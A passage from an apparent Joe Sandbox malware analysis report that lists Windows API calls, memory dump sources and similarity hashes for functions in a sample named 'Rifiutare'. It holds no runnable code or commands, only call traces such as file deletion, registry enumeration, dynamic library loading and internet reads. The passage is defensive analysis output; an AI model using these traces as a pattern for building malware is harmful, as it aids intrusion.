                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA353F
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA3551
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$Copy
                                                                                • String ID:
                                                                                • API String ID: 3226157194-0
                                                                                • Opcode ID: c5f73829c3922af1ea4e75d743b94cc407ec86dab6407d3c907920ce108692ae
                                                                                • Instruction ID: 83ede3dae099b6739e4ac2f6aff1955d211657598ea7f7bb8025e67e9c791f78
                                                                                • Opcode Fuzzy Hash: c5f73829c3922af1ea4e75d743b94cc407ec86dab6407d3c907920ce108692ae
                                                                                • Instruction Fuzzy Hash: 32B15E72D00169ABDF15DBA4CC95EDEBBBDEF09304F0040A6F50AE6141EA349B85DB61
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00CBAB99
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CBABA7
                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CBABDA
                                                                                • CloseHandle.KERNEL32(?), ref: 00CBADAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 3488606520-0
                                                                                • Opcode ID: 5ce05f0967749516fcba624f6da9f6d0d7253f6df74165516e661e42a7889db4
                                                                                • Instruction ID: 47b1282c101f3bfd17ba9f49c764abb392b42a8d8afcd22f7d48ee59acaa5d3d
                                                                                • Opcode Fuzzy Hash: 5ce05f0967749516fcba624f6da9f6d0d7253f6df74165516e661e42a7889db4
                                                                                • Instruction Fuzzy Hash: E6A18F71604301AFD720DF25D882F6AB7E5AF44710F14885DF9AA9B2D2DB70ED41CB92
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC225
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CBC280
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CBC2E3
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00CBC326
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00CBC333
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 826366716-0
                                                                                • Opcode ID: 1f44820ad63d4015c66364af253cab282a0cbdb5886e4cad93f68a4f619f3aaf
                                                                                • Instruction ID: f55e26bea34838ab6bdddb83d4ae1666fe7236a2e7b051745406e964ee4a6737
                                                                                • Opcode Fuzzy Hash: 1f44820ad63d4015c66364af253cab282a0cbdb5886e4cad93f68a4f619f3aaf
                                                                                • Instruction Fuzzy Hash: 0C61B471218241AFC714DF54C8D0EAABBE5FF84308F54855CF4AA8B2A2DB31ED45DB92
                                                                                APIs
                                                                                  • Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C9D678,?), ref: 00C9E5C6
                                                                                  • Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C9D678,?), ref: 00C9E5DF
                                                                                  • Part of subcall function 00C9E970: GetFileAttributesW.KERNEL32(?,00C9D6EB), ref: 00C9E971
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00C9EC4A
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00C9EC83
                                                                                • _wcslen.LIBCMT ref: 00C9EDC2
                                                                                • _wcslen.LIBCMT ref: 00C9EDDA
                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C9EE27
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3183298772-0
                                                                                • Opcode ID: b88e06fb879fd37f6f2e1d1a923f85a72a2295f1366b3749b1d58f104c041f57
                                                                                • Instruction ID: 912bb07182309b9dae42ef10596b97500f460ce5563a13331936d555df41bb91
                                                                                • Opcode Fuzzy Hash: b88e06fb879fd37f6f2e1d1a923f85a72a2295f1366b3749b1d58f104c041f57
                                                                                • Instruction Fuzzy Hash: 7D5154B24083849BCB24DB94DC95ADFB7ECAF94300F00092EF5D9D3152EF74A688975A
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00C993E9
                                                                                • VariantClear.OLEAUT32 ref: 00C9945A
                                                                                • VariantClear.OLEAUT32 ref: 00C994B9
                                                                                • VariantClear.OLEAUT32(?), ref: 00C9952C
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C99557
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: c97e2c1e84eb6bf2d343f4b8099dbc274718deb1962a8d46e21fe29aec1f796a
                                                                                • Instruction ID: f26dca2967d126c7bd2f5dfcaabe9498dddd5fb1ddc09276537b7f58425e2471
                                                                                • Opcode Fuzzy Hash: c97e2c1e84eb6bf2d343f4b8099dbc274718deb1962a8d46e21fe29aec1f796a
                                                                                • Instruction Fuzzy Hash: 34514AB5A00219EFDB15CF58C884AAAB7F8FF89314B158569F915DB310E730E911CF50
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CA93AF
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00CA93DB
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CA9433
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CA9458
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CA9460
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: d13f1e31bb607e952ea04b18781b49b9eb43f216f7fd7c4f6367f5bd75d4aa40
                                                                                • Instruction ID: 7bea4caba592c5c2f7a790016cc1e90eed52aec3cc61af15cbdb69f4d4a3582a
                                                                                • Opcode Fuzzy Hash: d13f1e31bb607e952ea04b18781b49b9eb43f216f7fd7c4f6367f5bd75d4aa40
                                                                                • Instruction Fuzzy Hash: 70513A35A002159FCB15DF64C885EADBBF5FF49354F048058E84AAB3A2CB31ED51DB90
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00CB96B2
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CB9742
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CB975E
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CB97A4
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00CB97C4
                                                                                  • Part of subcall function 00C4F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CA18D4,?,753CE610), ref: 00C4FA0E
                                                                                  • Part of subcall function 00C4F9F1: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C90283,00000000,00000000,?,?,00CA18D4,?,753CE610,?,00C90283), ref: 00C4FA35
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: aa45ffcddf2a7d3d0f1455f827593b0041e0ec676667e8a6f8b138bff80dc6f1
                                                                                • Instruction ID: b0b287ddea994bcaf9137abcbc335c61826996d4f295d60165ed83ea4b75cb81
                                                                                • Opcode Fuzzy Hash: aa45ffcddf2a7d3d0f1455f827593b0041e0ec676667e8a6f8b138bff80dc6f1
                                                                                • Instruction Fuzzy Hash: 205128756142459FCB11DF58C4949DDBBF0FF09324F0981A8E91AAB362DB31EE85CB90
                                                                                APIs
                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CC721A
                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00CC7231
                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CC725A
                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00CAB3AC,00000000,00000000), ref: 00CC727F
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CC72AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MessageSendShow
                                                                                • String ID:
                                                                                • API String ID: 3688381893-0
                                                                                • Opcode ID: 1c51a014ebb6c2827aac8204f7787da3d73c5ab2a5a8bff01d4179f312a17662
                                                                                • Instruction ID: eaf757b7483cfe239e13bea272578034bac69bb3c165af9e0e04fdf85b4d654b
                                                                                • Opcode Fuzzy Hash: 1c51a014ebb6c2827aac8204f7787da3d73c5ab2a5a8bff01d4179f312a17662
                                                                                • Instruction Fuzzy Hash: A4418335A08204EFD725DF78CC48FA9BBA5EB49360F150368F869A72E1C770AE41DE50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 1130db3c206f076f8d4d66756ccab7d85c40442c5338ff053f3df29498ebfe35
                                                                                • Instruction ID: a656f8484d060b3f200e5071606e8984335cf1f489ba2d06451faef240ad9621
                                                                                • Opcode Fuzzy Hash: 1130db3c206f076f8d4d66756ccab7d85c40442c5338ff053f3df29498ebfe35
                                                                                • Instruction Fuzzy Hash: F041B232A006009BCB24DF68C8C1A6DB7E5EF84314F1545A8E916EB391DA31ED42DB41
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 00CA41E2
                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CA4239
                                                                                • TranslateMessage.USER32(?), ref: 00CA4262
                                                                                • DispatchMessageW.USER32(?), ref: 00CA426C
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CA427D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: 31b350059041038b6ec378d89b9d8b62a3a5386658b0cb442d27410a0aabe92b
                                                                                • Instruction ID: d6eb2402d56f00bd1b7ca5e325519eaf0eba14bed32dd49d244e886a00bb6a05
                                                                                • Opcode Fuzzy Hash: 31b350059041038b6ec378d89b9d8b62a3a5386658b0cb442d27410a0aabe92b
                                                                                • Instruction Fuzzy Hash: 4F31B5705413439EEB3C8B74D848FBA3BA8AB5230CF14062DE57AC25A0E7F49A85D721
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00C9218F
                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C9223B
                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 00C92243
                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C92254
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C9225C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 73fe2d1af2742b25e202060b901e764877d96dacc5b52e53b858009dae3710be
                                                                                • Instruction ID: 89b845a0ff46fa51ce5723eefccc2bde99519e98ea0a9443733ceca53edf8d9c
                                                                                • Opcode Fuzzy Hash: 73fe2d1af2742b25e202060b901e764877d96dacc5b52e53b858009dae3710be
                                                                                • Instruction Fuzzy Hash: 93319E72900219EFDF04CFA8CD8DB9E7BB5EB04325F104229FA66A72D1C3709A54DB90
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD766
                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00CAD79D
                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD7E2
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD7F6
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00CACA51,00000000), ref: 00CAD820
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                • String ID:
                                                                                • API String ID: 3191363074-0
                                                                                • Opcode ID: 9b406ed070da95e31288be4b70062fd5ff47b65b50f4934fadece596ff11082c
                                                                                • Instruction ID: cb81484bedf57a93745a5a1162670ffc13359a66f7b035dd6cc4678ae0da02ad
                                                                                • Opcode Fuzzy Hash: 9b406ed070da95e31288be4b70062fd5ff47b65b50f4934fadece596ff11082c
                                                                                • Instruction Fuzzy Hash: 9B315E71900606AFDB24DFA5D888EAFBBF8EB05359B10442DE457D2550DB34EE41DBA0
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00CB1197
                                                                                • GetForegroundWindow.USER32 ref: 00CB11AE
                                                                                • GetDC.USER32(00000000), ref: 00CB11EA
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00CB11F6
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00CB122E
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 956bbdf563500ed06932d3b502b453093981f2c9e6fd9b8d9e3ef563cf9c4ca1
                                                                                • Instruction ID: 090562696b2f0baea576341cb6af5730141eccf6970c3397fb33edb15faf09cc
                                                                                • Opcode Fuzzy Hash: 956bbdf563500ed06932d3b502b453093981f2c9e6fd9b8d9e3ef563cf9c4ca1
                                                                                • Instruction Fuzzy Hash: 5D216D36A10214AFD714EF69C898A9EBBE5EF49300F048478F84BE7661DA30AD44DB90
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00C6D1E6
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6D209
                                                                                  • Part of subcall function 00C63C40: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B,?,?,00C310E8,00CCDBF4), ref: 00C63C72
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C6D22F
                                                                                • _free.LIBCMT ref: 00C6D242
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6D251
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: b2fff6e10dcec8709a77c80df0aa035ae46ea1ef4186f4f42ae14918f96ea726
                                                                                • Instruction ID: 1a070e1697575c42f192cbcf39931cecccdfdda1eaf3740f3f4b19e792b82435
                                                                                • Opcode Fuzzy Hash: b2fff6e10dcec8709a77c80df0aa035ae46ea1ef4186f4f42ae14918f96ea726
                                                                                • Instruction Fuzzy Hash: 3E018FB2B016157F23312ABAACD8E7F6B6DDEC6FA13190179FD06D2200DE60CD0191B1
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,?,00C62C3D,00C63C83,?,?,00C50215,00000000,?,00C38E5F,00000004,?,00C74C6B), ref: 00C6321D
                                                                                • _free.LIBCMT ref: 00C63252
                                                                                • _free.LIBCMT ref: 00C63279
                                                                                • SetLastError.KERNEL32(00000000), ref: 00C63286
                                                                                • SetLastError.KERNEL32(00000000), ref: 00C6328F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 03412954ec324a7c5c15bd5596b27bd184b14ad42639341d6a4e3e901d0cffcb
                                                                                • Instruction ID: 26df8b049f0eee108dd97da8ab5adb8804514e16e97a916ccbd1c4f632022db5
                                                                                • Opcode Fuzzy Hash: 03412954ec324a7c5c15bd5596b27bd184b14ad42639341d6a4e3e901d0cffcb
                                                                                • Instruction Fuzzy Hash: DA01A976144A8067C23267359CD9F6E176EAFD53707350128F92692193EF74CB05A131
                                                                                APIs
